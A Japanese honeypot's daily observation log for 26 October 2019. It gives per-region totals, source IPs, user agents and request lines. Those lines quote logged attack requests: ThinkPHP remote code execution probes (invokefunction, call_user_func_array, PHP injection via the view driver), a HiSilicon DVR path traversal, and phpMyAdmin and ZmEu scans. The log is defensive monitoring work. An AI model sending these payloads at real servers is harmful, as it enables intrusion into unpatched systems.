ハニーポット(仮) 観測記録 2019/10/26分です。

特徴

Region：AP

ThinkPHPの脆弱性を狙うアクセス (今までとは違ったパターンも観測しました)
Shenzhen TVT製品の脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
Dockerfileに対するアクセス
を確認しました。

Region：US

HiSilicon DVR Devicesの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス (今までとは違ったパターンも観測しました)
Shenzhen TVT製品の脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
ZmEuによるスキャン行為
を確認しました。

Region：EU

Dockerfileに対するアクセス
phpMyAdminに対するスキャン行為
ZmEuによるスキャン行為
を確認しました。

他

アクセス数推移

AP：総アクセス数：71 (前日比：+58)
US：総アクセス数：91 (前日比：-141)
EU：総アクセス数：13 (前日比：+8)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Region：AP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	108.210.130.114	United States
4	122.51.64.238	China
1	139.199.170.242	China
1	159.203.196.79	United States
45	185.128.41.50	Switzerland
2	185.31.163.237	Russia
1	193.188.22.76	Russia
1	201.111.50.191	Mexico
1	201.124.96.224	Mexico
4	24.193.76.19	United States
1	37.34.155.11	Kuwait
1	61.219.11.153	Taiwan
1	66.249.71.121	United States
1	81.40.113.29	Spain
5	82.119.104.180	Slovakia
1	82.62.129.62	Italy

UserAgent一覧

件数	UserAgent
3	-
10	ApiTool
1	curl/7.47.0
1	Go-http-client/1.1
45	Java/1.8.0_131
1	Mozilla/5.0
1	Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
5	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
1	Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
3	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)

リクエスト内容一覧

件数	Method	Request	Protocol
1	-
1	GET	/Dockerfile	HTTP/1.1
1	GET	/Dockerfile	HTTP/1.1\n
1	GET	/editBlackAndWhiteList	HTTP/1.1
3	GET	/index.php	HTTP/1.1
6	GET	/index.php?s=captcha	HTTP/1.1
1	GET	/index.php?s=index/index/index	HTTP/1.1
1	GET	/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1]=phpinfo()	HTTP/1.1
1	GET	/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	GET	/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	GET	/index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	GET	/index.php?s=/index/\\think\\request/cache&key=1	phpinfo|HTTP/1.1
1	GET	/index.php?s=index/\think\Request/input&filter=phpinfo&data=1	HTTP/1.1
1	GET	/index.php?s=index/\think\view\driver\Php/display&content=<%3fphp+phpinfo()%3b%3f>	HTTP/1.1
1	GET	/mysql/admin/index.php?lang=en	HTTP/1.1
1	GET	/mysql/dbadmin/index.php?lang=en	HTTP/1.1
1	GET	/mysql/mysqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/mysql/sqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin/index.php?lang=en	HTTP/1.1
3	GET	/public/index.php	HTTP/1.1
3	GET	/public/index.php?s=captcha	HTTP/1.1
1	GET	/public/index.php?s=captcha&test=1	HTTP/1.1
1	GET	/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1]=phpinfo()	HTTP/1.1
1	GET	/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	GET	/public/?s=captcha	HTTP/1.1
1	GET	/public/?s=captcha&test=1	HTTP/1.1
1	GET	/public/?s=index/index/index	HTTP/1.1
1	GET	/public/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	GET	/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	GET	/public/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	GET	/public/?s=index/\think/module/aciton/param1/${%40print(THINK_VERSION)}	HTTP/1.1
1	GET	/public/?s=index/\think\module/action/param1/${%40phpinfo()}	HTTP/1.1
1	GET	/public/?s=index/\think\Module/Action/Param/${%40phpinfo()}	HTTP/1.1
1	GET	/public/?s=/index/\\think\\request/cache&key=1	phpinfo|HTTP/1.1
1	GET	/public/?s=index/\think\Request/input&filter=phpinfo&data=1	HTTP/1.1
1	GET	/public/?s=index/\think\view\driver\Php/display&content=<%3fphp+phpinfo()%3b%3f>	HTTP/1.1
1	GET	/robots.txt	HTTP/1.1
3	GET	/?s=captcha	HTTP/1.1
1	GET	/?s=index/\think/module/aciton/param1/${%40print(THINK_VERSION)}	HTTP/1.1
1	GET	/?s=index/\think\module/action/param1/${%40phpinfo()}	HTTP/1.1
1	GET	/?s=index/\think\Module/Action/Param/${%40phpinfo()}	HTTP/1.1
1	GET	/thinkphp/library/think/Request.php?c=exec&f=phpinfo&&_method=filter&	HTTP/1.1
1	GET	/TP/index.php	HTTP/1.1
1	GET	/TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	GET	/TP/public/index.php	HTTP/1.1
1	GET	/webdav/	HTTP/1.1
10	POST	/editBlackAndWhiteList	HTTP/1.1
1	POST	/TP/index.php?s=captcha	HTTP/1.1
1	\x03

Region:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
10	112.29.140.213	China
1	113.161.80.254	Vietnam
10	115.159.122.71	China
1	115.163.140.148	Japan
7	153.126.205.162	Japan
12	157.245.241.112	United States
45	185.128.41.50	Switzerland
1	47.41.47.93	United States
1	51.254.196.14	France
3	89.248.169.17	Netherlands

UserAgent一覧

件数	UserAgent
6	-
1	ApiTool
2	Go-http-client/1.1
45	Java/1.8.0_131
18	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
18	ZmEu

リクエスト内容一覧

件数	Method	Request	Protocol
3
2	GET	/elrekt.php	HTTP/1.1
2	GET	/html/public/index.php	HTTP/1.1
1	GET	HTTP/1.1
5	GET	/index.php	HTTP/1.1
6	GET	/index.php?s=captcha	HTTP/1.1
1	GET	/index.php?s=index/index/index	HTTP/1.1
1	GET	/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1]=phpinfo()	HTTP/1.1
1	GET	/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
3	GET	/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	GET	/index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	GET	/index.php?s=/index/\\think\\request/cache&key=1	phpinfo|HTTP/1.1
1	GET	/index.php?s=index/\think\Request/input&filter=phpinfo&data=1	HTTP/1.1
1	GET	/index.php?s=index/\think\view\driver\Php/display&content=<%3fphp+phpinfo()%3b%3f>	HTTP/1.1
1	GET	login.cgi	HTTP/1.0
1	GET	../../mnt/custom/ProductDefinition	HTTP
2	GET	/myadmin/scripts/setup/php	HTTP/1.1
1	GET	/myadmin/scripts/setup.php	HTTP/1.1
3	GET	/MyAdmin/scripts/setup.php	HTTP/1.1
3	GET	/phpmyadmin/scripts/setup.php	HTTP/1.1
3	GET	/phpMyAdmin/scripts/setup.php	HTTP/1.1
3	GET	/pma/scripts/setup.php	HTTP/1.1
5	GET	/public/index.php	HTTP/1.1
3	GET	/public/index.php?s=captcha	HTTP/1.1
1	GET	/public/index.php?s=captcha&test=1	HTTP/1.1
1	GET	/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1]=phpinfo()	HTTP/1.1
1	GET	/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	GET	/public/?s=captcha	HTTP/1.1
1	GET	/public/?s=captcha&test=1	HTTP/1.1
1	GET	/public/?s=index/index/index	HTTP/1.1
1	GET	/public/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	GET	/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	GET	/public/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1	HTTP/1.1
1	GET	/public/?s=index/\think/module/aciton/param1/${%40print(THINK_VERSION)}	HTTP/1.1
1	GET	/public/?s=index/\think\module/action/param1/${%40phpinfo()}	HTTP/1.1
1	GET	/public/?s=index/\think\Module/Action/Param/${%40phpinfo()}	HTTP/1.1
1	GET	/public/?s=/index/\\think\\request/cache&key=1	phpinfo|HTTP/1.1
1	GET	/public/?s=index/\think\Request/input&filter=phpinfo&data=1	HTTP/1.1
1	GET	/public/?s=index/\think\view\driver\Php/display&content=<%3fphp+phpinfo()%3b%3f>	HTTP/1.1
3	GET	/?s=captcha	HTTP/1.1
1	GET	/?s=index/\think/module/aciton/param1/${%40print(THINK_VERSION)}	HTTP/1.1
1	GET	/?s=index/\think\module/action/param1/${%40phpinfo()}	HTTP/1.1
1	GET	/?s=index/\think\Module/Action/Param/${%40phpinfo()}	HTTP/1.1
2	GET	/thinkphp/html/public/index.php	HTTP/1.1
1	GET	/thinkphp/library/think/Request.php?c=exec&f=phpinfo&&_method=filter&	HTTP/1.1
2	GET	/TP/html/public/index.php	HTTP/1.1
2	GET	/TP/index.php	HTTP/1.1
2	GET	/TP/public/index.php	HTTP/1.1
3	GET	/w00tw00t.at.blackhats.romanian.anti-sec:)	HTTP/1.1
1	GET	/wp-login.php	HTTP/1.1
1	POST	/editBlackAndWhiteList	HTTP/1.1
2	POST	/index.php?s=captcha	HTTP/1.1

Region:EU

送信元IPアドレス一覧

件数	送信元IPアドレス	国
7	153.126.205.162	Japan
1	185.31.163.237	Russia
1	23.239.12.17	United States
4	71.6.199.23	United States

UserAgent一覧

件数	UserAgent
5	-
1	Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
1	python-requests/2.19.1
6	ZmEu

リクエスト内容一覧

件数	Method	Request	Protocol
1	GET	/Dockerfile	HTTP/1.1\n
1	GET	/favicon.ico	HTTP/1.1
1	GET	/HNAP1/	HTTP/1.1
1	GET	HTTP/1.1
1	GET	/myadmin/scripts/setup.php	HTTP/1.1
1	GET	/MyAdmin/scripts/setup.php	HTTP/1.1
1	GET	/phpmyadmin/scripts/setup.php	HTTP/1.1
1	GET	/phpMyAdmin/scripts/setup.php	HTTP/1.1
1	GET	/pma/scripts/setup.php	HTTP/1.1
1	GET	/robots.txt	HTTP/1.1
1	GET	/sitemap.xml	HTTP/1.1
1	GET	/w00tw00t.at.blackhats.romanian.anti-sec:)	HTTP/1.1
1	GET	/.well-known/security.txt	HTTP/1.1